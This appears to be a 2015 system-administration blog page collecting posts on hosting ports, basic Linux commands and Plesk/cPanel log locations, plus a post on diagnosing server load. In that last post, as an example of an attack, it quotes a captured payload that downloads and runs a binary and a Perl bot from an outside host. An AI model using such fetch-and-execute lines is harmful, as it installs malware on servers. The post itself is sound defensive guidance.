Thursday, February 26, 2015

Commonly Used Ports -Part1

This is a list of commonly used ports                                               Next Part 2 >>

cPanel

      cPanel     2082
      cPanel - SSL     2083
      WHM     2086
      WHM - SSL     2087
      Webmail     2095
      Webmail - SSL     2096

Plesk Panel

      Plesk Control Panel     8880
      Plesk Control Panel - SSL     8443
      Plesk Linux Webmail     N/A*
      Plesk Windows Webmail (SmarterMail)     9998**
      Plesk Webmail   8383

Email

      POP3     110
      POP3 - SSL     995
      IMAP     143
      IMAP - SSL     993
      SMTP     25
      SMTP Alternate     26
      SMTP Alternate     587
      SMTP - SSL     465

Web

      HTTP     80
      SSL     443
      FTP     21
      FTPs     990
      SFTP     22
      SFTP Shared/Reseller Servers     2222
      Webdisk     2077
      Webdisk - SSL     2078
      MySQL     3306
      MSSQL     1433
      SSH     22
      SSH Shared/Reseller Servers     2222

Other

      Virtuozzo     4643
      DotNet Panel     9001
      DotNet Panel Login     80

      RDP (Remote Desktop Protocol)     3389                                               Next Part 2 >>

Posted by at No comments:
Labels: , , ,

Tuesday, February 24, 2015

Basic Linux Commands -Part 1

The Manual (terminal mode)                                                           Next Part 2 >>


man                                This command brings up the online Unix
manual. Use it on each of the commands below.
For Example:   
man pwd                        You will see the manual for the pwd command.

Accessing files in Folders (Directories) in terminal mode


pwd                                Shows what directory (folder) you are in.
In Linux, your home directory is /home/particle
·       Let's suppose you have several data files (data1, data2 ... etc.) in a directory called muondata.
·       Then suppose the directory muondata is an entry in your main home directory, /home/particle .
·       If you are in your home directory (where terminals start) and type pwd, you will see /home/particle.
·       If you were in the muondata directory, pwd would give you /home/particle/muondata instead    
·       The last slash after a directory name is optional.

As you can see, each slash (/) indicates another sub-directory.
cd                                  Changes directories.

Examples of relative movement among directories:
cd muondata                Moves down from your current directory
into the muondata sub-directory

cd ..                            Moves up one directory (yes, include the
two little dots) 

You can also move directly into directories
cd /home/particle/muondata
                   Moves from ANY directory into the muondata
sub-directory of your home directory.

cd ~               Takes you back to your home directory
(/home/particle)

Making or Removing a Directory (terminal mode)


mkdir dirName            Creates a directory with name dirName.

For Example:
mkdir temp             Creates the directory temp.

rmdir dirName      Removes a directory dirName.

For Example:
rmdir temp                  Removes the directory temp.

Looking at or Finding your Files (terminal mode)


ls                                  Lists files.

If you add -al after ls it will give more details for each file. Such as, size, permissions, owners, dates etc.

ls al                          You'll see a huge list of files that you can't see with the 'ls' command alone and lots of details.

If you see such a long list of files that they scroll off the terminal screen, one way to solve the problem is to use:

ls -al |more       Shows one screen of file names at a time.

less data1         Dumps the contents of the data1 file to your screen with a pause at each line so you don't miss any contents as they scroll. You may move through the file using page up, page down, home and end keys.  When done with less you use the q key to get back to the main terminal.

whereis data1      Shows you the location of the data1 file.

Altering your Files


rm data1                      Deletes the file data1 in the current directory. 

rm -i muon*                Removes all of your muon data files
(careful!!  rm * will remove ALL your files) 
The "-i" makes the computer prompt before removing each file.  If you really want to work without a net, omit the "-i".

cp data1 newdata/    will copy the file data1 to the directory newdata (assuming it has already been created)

mv data1 newdata/    moves the file data1 to the folder newdata and deletes the old one.


Using the Floppy Disk Drive in Linux


mount              Mounts a drive to the operating system.
Linux does not 'see' the floppy drive until
you tell it to.
For Example:
mount /mnt/floppy    Allows you to use the floppy drive which has directory name /mnt/floppy

cp aFile /mnt/floppy/     Copies the file aFile to the floppy disk.

ls /mnt/qfloppy/          Allows you to see what files are on your floppy.

You may run into problems moving large files onto a 1.44MB floppy disk.  One option to fit larger files is to create a zip archive containing the file onto the floppy.  For Example:

zip /mnt/floppy/myFile.zip muon.myDataRun 
                   Moves the file muon.myDataRun into a zip file on the floppy named myFile.zip

After you are done and before you eject it (this is very, very important), you must unmount the floppy.

umount /mnt/qfloppy     Allows you to remove the floppy disk

·       Make sure you wait for the command prompt to reappear (this might take a few seconds) before ejecting the floppy. 
·       If you eject the floppy before you unmount the floppy, it may corrupt the data on the floppy and cause the system to be confused if you try to use the floppy again. 
·       If you make a mistake like this, it's probably best to reboot.  Sorry.

df                                  Shows the disk usage. This will tell you how much disk space you have left on your hard drive as well as the floppy.

Posted by at No comments:
Labels: ,

Monday, February 23, 2015

cPanel vs. Plesk - Side by Side Functionality Comparison

WHM / cPanel versus Plesk 10

WHM/cPanel and Plesk are both feature rich control panels with similar functionality.  They are, however, organized completely differently, have a different security model and use slightly different terminology.

We have several tables comparing each side by side:
  • Functionality & Common Tasks 
  • Account Setup & Security Model 
  • Terminology 

Functionality & Common Tasks


Read more »
Posted by at 2 comments:
Labels: , , ,

Plesk Panel for Windows service logs and configuration files

Control Panel

  • Logs:
    • Access log: %plesk_dir%\admin\logs\W3SVC<IIS site ID>\ex<date>.log
    • PHP errors: %plesk_dir%\admin\logs\php_error.log
    • Panel log: %plesk_dir%\admin\logs\panel.log
    • Debug logs: %plesk_dir%\admin\logs\plesklog_debugXXXXXXXX.log (create DWORD value Debug=1 in "HKLM\SOFTWARE\PLESK\PSA Config\Config")
  • Service control:
    • Stop: net stop plesksrv /Y
    • Start: net start plesksrv && net start poppassd
    • Restart: net stop plesksrv /Y && net start plesksrv && net start poppassd
  • Configuration:
    • %plesk_dir%\admin\php.ini
    • %plesk_dir%\admin\conf\panel.ini
    • IIS manager > Sites/Application Pools > PleskControlPanel

Web Presence Builder

  • Logs:
    • Error logs: %plesk_dir%\sb\logs\
    • Install/upgrade logs: %plesk_dir%\sb\tmp\
  • No service control (working on IIS)
  • Configuration:
    • %plesk_dir%\sb\config

phpMyAdmin

  • Logs:
    • %plesk_dir%\admin\logs\W3SVC<IIS site ID>\ex<date>.log
  • No service control (working via the plesksrv service).
  • Configuration:
    • %plesk_dir%\admin\htdocs\domains\databases\phpMyAdmin\config.inc.php

ASP.Net Enterprise Manager

  • Configuration:
    • IIS manager > Sites > sqladmin(default) > View Applications > /mssql

myLittleAdmin 2000/2005

  • Configuration:
    • IIS manager > Sites > sqladmin(default) > View Applications > /myLittleAdmin
    • %plesk_vhosts%\sqladmin\myLittleAdmin\2005\config.xml

MailEnable

  • Logs:
    • %plesk_dir%\Mail Servers\Mail Enable\Logging
  • Service control:
    • Stop: net stop meimaps && net stop melcs && net stop memtas && net stop mepops && net stop mepocs && net stop mesptpcs
    • Start: net start meimaps && net start melcs && net start memtas && net start mepops && net start mepocs && net start mesptpcs
    • Restart: net stop meimaps && net stop melcs && net stop memtas && net stop mepops && net stop mepocs && net stop mesptpcs && net start meimaps && net start melcs && net start memtas && net start mepops && net start mepocs && net start mesptpcs
  • Configuration:
    • %plesk_dir%\Mail Servers\Mail Enable\Bin\MailEnable.msc

Named / BIND

  • Logs:
    • Windows Event Viewer
  • Service control:
    • Stop: net stop named
    • Start: net start named
    • Restart: net stop named && net start named
  • Configuration:
    • %plesk_dir%\dns
Read more »
Posted by at No comments:
Labels: ,

Thursday, February 19, 2015

Plesk for Linux services logs and configuration files

Services

Control Panel

  • Logs
    • Error log: /var/log/sw-cp-server/error_log and /var/log/sw-cp-server/sw-engine.log
    • Access log: /usr/local/psa/admin/logs/httpsd_access_log
    • Panel log: /usr/local/psa/admin/logs/panel.log
  • Services
    • Stop: /etc/init.d/psa stop
    • Start: /etc/init.d/psa start
    • Restart: /etc/init.d/psa restart
  • Configuration
    • PHP config: /usr/local/psa/admin/conf/php.ini
    • Panel config: /usr/local/psa/admin/conf/panel.ini
    • Web server config: /etc/sw-cp-server/conf.d/plesk.conf

Web Presence Builder

  • Logs
    • Error log: /usr/local/psa/admin/logs/sitebuilder.log
    • Install/upgrade logs: /usr/local/sb/tmp/
  • No service control (working via sw-cp-server service)
  • Configuration
    • /usr/local/sb/config
    • /etc/sw-cp-server/conf.d/plesk.conf
    • /usr/local/psa/admin/conf/php.ini

SSO

  • Logs
    • Error log: /var/log/sw-cp-server/error_log
    • SSO log: /var/log/sso/sso.log
  • Services
    • No service control (works via sw-cp-server service)
    • Manage settings: /usr/local/psa/bin/sso
  • Configuration
    • /etc/sso/sso_config.ini
    • /etc/sw-cp-server/conf.d/sso.inc

Backup Manager

  • Logs
    • Backup logs: /usr/local/psa/PMM/logs/backup-<datetime>
    • Restore log: /usr/local/psa/PMM/logs/restore-<datetime>
  • Functionality is controlled by the Plesk control panel service
  • Configuration
    • /etc/psa/psa.conf

Migration Manager

  • Logs
    • /usr/local/psa/PMM/logs/migration-<datetime>
  • Functionality is controlled by the Plesk control panel service.

Health Monitor manager

  • Logs
    • /usr/local/psa/admin/logs/health-alarm.log
  • Services
    • Stop: /etc/init.d/sw-collectd stop
    • Start: /etc/init.d/sw-collectd start
    • Restart: /etc/init.d/sw-collectd restart
  • Configuration
    • /usr/local/psa/admin/conf/health-config.xml
    • /usr/local/psa/var/custom-health-config.xml
    • /etc/sw-collectd/collectd.conf

Health Monitor Notification Daemon

  • Logs
    • /usr/local/psa/admin/logs/health-alarm.log
  • Services
    • Stop: /etc/init.d/psa-health-monitor-notificationd stop
    • Start: /etc/init.d/psa-health-monitor-notificationd start
    • Restart: /etc/init.d/psa-health-monitor-notificationd restart
  • Configuration
    • /usr/local/psa/admin/conf/health-config.xml
    • /usr/local/psa/var/custom-health-config.xml

MySQL

  • Logs
    • /var/log/mysqld.log
  • Services
    • Stop: /etc/init.d/mysqld stop
    • Start: /etc/init.d/mysqld start
    • Restart: /etc/init.d/mysqld restart
  • Configuration
    • /etc/my.cnf
    • /etc/mysql/my.cnf (Debian/Ubuntu)

PostgreSQL

  • Logs
    • /var/lib/pgsql/pgstartup.log
  • Services
    • Stop: /etc/init.d/postgresql stop
    • Start: /etc/init.d/postgresql start
    • Restart: /etc/init.d/postgresql restart
  • Configuration
    • /var/lib/pgsql/data/postgresql.conf

Apache

  • Logs
    • Global Access and Error logs: /var/log/httpd/
    • Domain logs: /var/www/vhosts/<domain>/logs
  • Services
    • Stop: /etc/init.d/httpd stop
    • Start: /etc/init.d/httpd start
    • Restart: /etc/init.d/httpd restart
  • Configuration
    • /etc/httpd/conf/httpd.conf
    • /etc/httpd/conf.d/zz010_psa_httpd.conf (includes generated configuration files with the rest of the vhosts and server configuration)
  • NOTE: On SuSE, Debian, and Ubuntu, the service is called "apache2". The path to its logs is /var/log/apache2 and the path to configs is /etc/apache2.

NGINX

  • Logs
    • Error log: /var/log/nginx/error.log
    • Access log: /var/log/nginx/access.log
    • Domain logs: /var/www/vhosts/<domain>/logs/proxy_access*_log
  • Services
    • Stop: /etc/init.d/nginx stop
    • Start: /etc/init.d/nginx start
    • Restart: /etc/init.d/nginx restart
    • NOTE: To disable nginx, go to "Tools & Settings > Services Management" and stop nginx from there.
  • Configuration
    • /etc/nginx/nginx.conf
    • /etc/nginx/conf.d/zz010_psa_nginx.conf (includes generated configuration files with the rest of the vhosts' and server configuration)

Tomcat

  • Logs
    • /var/log/tomcat5/*
  • Services
    • Stop: /etc/init.d/tomcat5 stop
    • Start: /etc/init.d/tomcat5 start
    • Restart: /etc/init.d/tomcat5 restart
  • Configuration
    • /etc/tomcat5/server.xml

FTP

  • Logs
    • /usr/local/psa/var/log/xferlog
    • /var/log/secure
  • No service control (works via xinetd service)
  • Configuration
    • /etc/xinetd.d/ftp_psa
    • /etc/proftpd.conf
    • /etc/proftpd.include

Xinetd

  • Logs
    • /var/log/messages
  • Services
    • Stop: /etc/init.d/xinetd stop
    • Start: /etc/init.d/xinetd start
    • Restart: /etc/init.d/xinetd restart
  • Configuration
    • /etc/xinetd.conf
    • /etc/xinetd.d/* (files with "." in the name are ignored)

BIND

  • Logs
    • /var/log/messages
  • Services
    • Stop: /etc/init.d/named stop
    • Start: /etc/init.d/named start
    • Restart: /etc/init.d/named restart
  • Configuration
    • /etc/named.conf
  • NOTE: In Debian/Ubuntu, the service is called "bind9."
Read more »
Posted by at No comments:
Labels: ,

Friday, February 6, 2015

CPanel logs Locations

CPanel logs for access, Apache, email, error, ftp, mysql, WHM

This guide will cover the locations of the log files for things such as access logs,
Apache web server logs, email logs, error logs, ftp logs, MySQL logs, and WHM logs.
If you'd like to have a poster of the 2013 cPanel logs location reference,
you can request them from cPanel directly.
You can also view a digitial copy of this poster directly online at go.cPanel.net/logposter.

cPanel logs:

Access logs and user actions
/usr/local/cpanel/logs/access_log
Account transfers and misc. logs
/var/cpanel/logs
Auditing log (account creations, deletions, etc)
/var/cpanel/accounting.log
Backup logs
/usr/local/cpanel/logs/cpbackup
Brute force protection (cphulkd) log
/usr/local/cpanel/logs/cphulkd.log
Cpanel dnsadmin dns clustering daemon
/usr/local/cpanel/logs/dnsadmin_log
Cpanel taskqueue processing daemon
/usr/local/cpanel/logs/queueprocd.log
DBmapping
/usr/local/cpanel/logs/setupdbmap_log
EasyApache build logs
/usr/local/cpanel/logs/easy/apache/
Error log
/usr/local/cpanel/logs/error_log
Installation log
/var/log/cpanel
License updates and errors
/usr/local/cpanel/logs/license_log
Locale database modifications
/usr/local/cpanel/logs/build_locale_database_log
Login errors (CPSRVD)
/usr/local/cpanel/logs/login_log
Horde
/var/cpanel/horde/log/
RoundCube
/var/cpanel/roundcube/log/
SquirrelMail
/var/cpanel/squirrelmail/
Panic log
/usr/local/cpanel/logs/panic_log
Per account bandwidth history (Cached)
/var/cpanel/bandwidth.cache/{USERNAME}
Per account bandwidth history (Human Readable)
/var/cpanel/bandwidth/{USERNAME}
Service status logs
/var/log/chkservd.log
Tailwatch driver tailwatchd log
/usr/local/cpanel/logs/tailwatch_log
Update analysis reporting
/usr/local/cpanel/logs/updated_analysis/{TIMESTAMP}.log
Update (UPCP) log
/var/cpanel/updatelogs/updated.{TIMESTAMP}.log
WebDisk (CPDAVD)
/usr/local/cpanel/logs/cpdavd_error_log
Website statistics log
/usr/local/cpanel/logs/stats_log

cPanel access log

Access logs and user actions
/usr/local/cpanel/logs/access_log

cPanel apache log

Apache restarts done through cPanel and WHM
/usr/local/cpanel/logs/safeapcherestart_log
Domain access logs
/usr/local/apache/domlogs/{DOMAIN}
Processing of log splitting
/usr/local/cpanel/logs/splitlogs_log
suPHP audit log
/usr/local/apache/logs/suphp_log
Web server and CGI application error log
/usr/local/apache/logs/error_log

cPanel email log

Delivery and receipt log
/var/log/exim_mainlog
Incoming mail queue
/var/spool/exim/input/
Log of messages rejected based on ACLS or other policies
/var/log/exim_rejectlog
Unexpected/Fatal error log
/var/log/exim_paniclog
IMAP, POP login attempts, transactions, fatal errors and spam scoring
/var/log/maillog
/var/log/messages

Mailman
/usr/local/cpanel/3rdparty/mailmain/logs

MySQL log

MySQL error log
/var/lib/mysql/{SERVER_NAME}.err
MySQL slow query log (if enabled in my.cnf)
/var/log/slowqueries

Posted by at No comments:
Labels: ,

Load Tackling in Cpanel Servers

As we all know, server stability is directly dependent on serverload. Based on my experience as an Linux Server Administrator in Cpanel servers, I am writing this article to share some of my ideas regarding load tackling.

Load, in computing, is a "measure of the amount of processing a computer system is currently performing, usually in the form of a scalar and as some variation on a percentage,"according to Wikipedia.

This article mainly concentrates in finding the causes for load.

Load Checking Commands

Here are some well-used load checking commands:

w

Shows who is logged on and what they are doing, e.g.:

07:28:29  up 41 days, 20:41,  2 users,  load average: 0.03, 0.09, 0.08
Server Time - 07:28:29  
Server Uptime -  up 41 days, 20:41hrs No: of users logged : 2 users
Load Average: 0.03,0.09, 0.08
1minute Load  : 0.03 Last 5 Min Load Avg:  0.09 Last 15 Min Load Avg: 0.08 

uptime

Same as w command, but uptime won't list the details of users

pstree

Displays a tree of processes.
pstree -apu
is more useful in checking the process list. You can get more details from the man pages.

top

To see currently running processes.

mysqladmin proc stat

Shows the current mysql process details.

Causes of Load

Some causes for load include:
  • High use of some processes
  • Perl script attacks
  • Spamming
  • Php scripts causing the load
  • MySQL Abuse
  • DOS attack
Most of abuse issues in the server can be found in the previous " Load Checking Commands" section.

High Use of Some Processes

You can find it using the command 'top -c' and 'pstree -apu'. Install CSF and configure it to get alerts on "Excessive resource usage."

Set your email address in this file: /etc/csf/resalert.txt

Perl Script Attacks

These attacks are usually caused by poor coding or vulnerabilities in software versions.

If those Perl scripts are running you can see something similar to below after running 'pstree -apu':
===========
├─perl,30478,user
   └─sh,30479 -c echo\\040\"`uname\\040-a`\";echo\\040\"`id`\";/bin/sh
   │       └─sh,30485 
===========
How to find the source of the Perl:
root@techyfix [~]# ls -alh /proc/30478 |grep cwd
==========
lrwxrwxrwx 1 user user 0 Sep 28 06:16 
cwd -> /home/user/public_html/media/
===========
You can see the Perl script running from " /home/user/public_html/media/" folder.

A sample Perl script might look like this example:
===========
   wget http://webstorch.com/a;chmod +x a;mv a sess_vttn737j6k0mci66akhs5u1261398401;./sess_vttn737j6k0mci66akhs5u1261398401; rm a*\');
 shell_exec(\'cd /tmp;curl -O http://webstorch.com/botek.txt;mv botek.txt .sessx;perl .sessxt;rm botek.txt.*;curl -O http://webstorch.com/a;chmod +x a;
 mv a sess_vttn737j6k0mci66akhs5u1261398401;./sess_vttn737j6k0mci66akhs5u1261398401;rm a*\'); 
 ============= 
Also, you can use the command " lsof -p 30478 |less " to get more information.
Preventive measures for blocking such Perl attacks include:
  • Disable allow_url_fopen and allow_url_include in your php.ini (/usr/local/lib/php.ini) file
  • Disable following functions in PHP:
    disable_functions = exec, shellexec, passthru, system, escapeshellcmd, escapeshellarg
  • Install mod_security (this also helps in reducing Iframe attacks )
Read more »
Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)